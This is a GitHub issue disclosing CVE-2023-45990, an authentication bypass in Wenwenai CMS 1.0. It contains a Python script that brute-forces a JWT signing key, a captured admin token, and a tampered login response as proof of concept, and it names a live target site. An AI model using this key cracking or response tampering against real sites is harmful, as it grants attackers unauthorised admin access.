Headline
CVE-2023-45990: WenwenAiCms Vulnerability Testing · Issue #2 · PwnCYN/Wenwenai
Insecure Permissions vulnerability in WenwenaiCMS v.1.0 allows a remote attacker to escalate privileges.
Product Name:
Wenwenai CMS
Affect version:
1.0
Case Address:
Demo:https://chat.wenwen-ai.com/
Target:https://laoluoai.com/
Vulnerability Type:
Logical Fallacies
Description:
Discover the backend login address through directory scanning, obtain the developer’s demo site address on the login interface, log in and capture packets based on the account password provided by the demo site, and record the response packet of the login data packet.
Based on the correct login return packet, the site can be found for JWT verification, and signature information can be guessed by blasting.
When logging in to the same source CMS login interface with an unknown account password, modify the login packet to the successful login packet information to achieve JWT verification and successfully log in to the backend.
400 error is prompted when login information is not known. At this time, the returned data packet information can be modified to successful login data information to bypass login.
Blasting:
import jwt
import termcolor
if __name__ == "__main__":
jwt_str = R'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic'
with open('topred.txt') as f:
for line in f:
key_ = line.strip()
try:
jwt.decode(jwt_str, verify=True, key=key_)
print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
break
except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError,
jwt.exceptions.ImmatureSignatureError):
print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
break
except jwt.exceptions.InvalidSignatureError:
print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
continue
else:
print('\r', '\bsorry! no key be found!')
Poc:
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Tue, 10 Oct 2023 10:53:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 295
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"127-ZwpaZ2UCZyA1cCA/eHV9Dl6CgjI"
Vary: Accept-Encoding
{"code":200,"data":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic","success":true,"message":"请求成功"}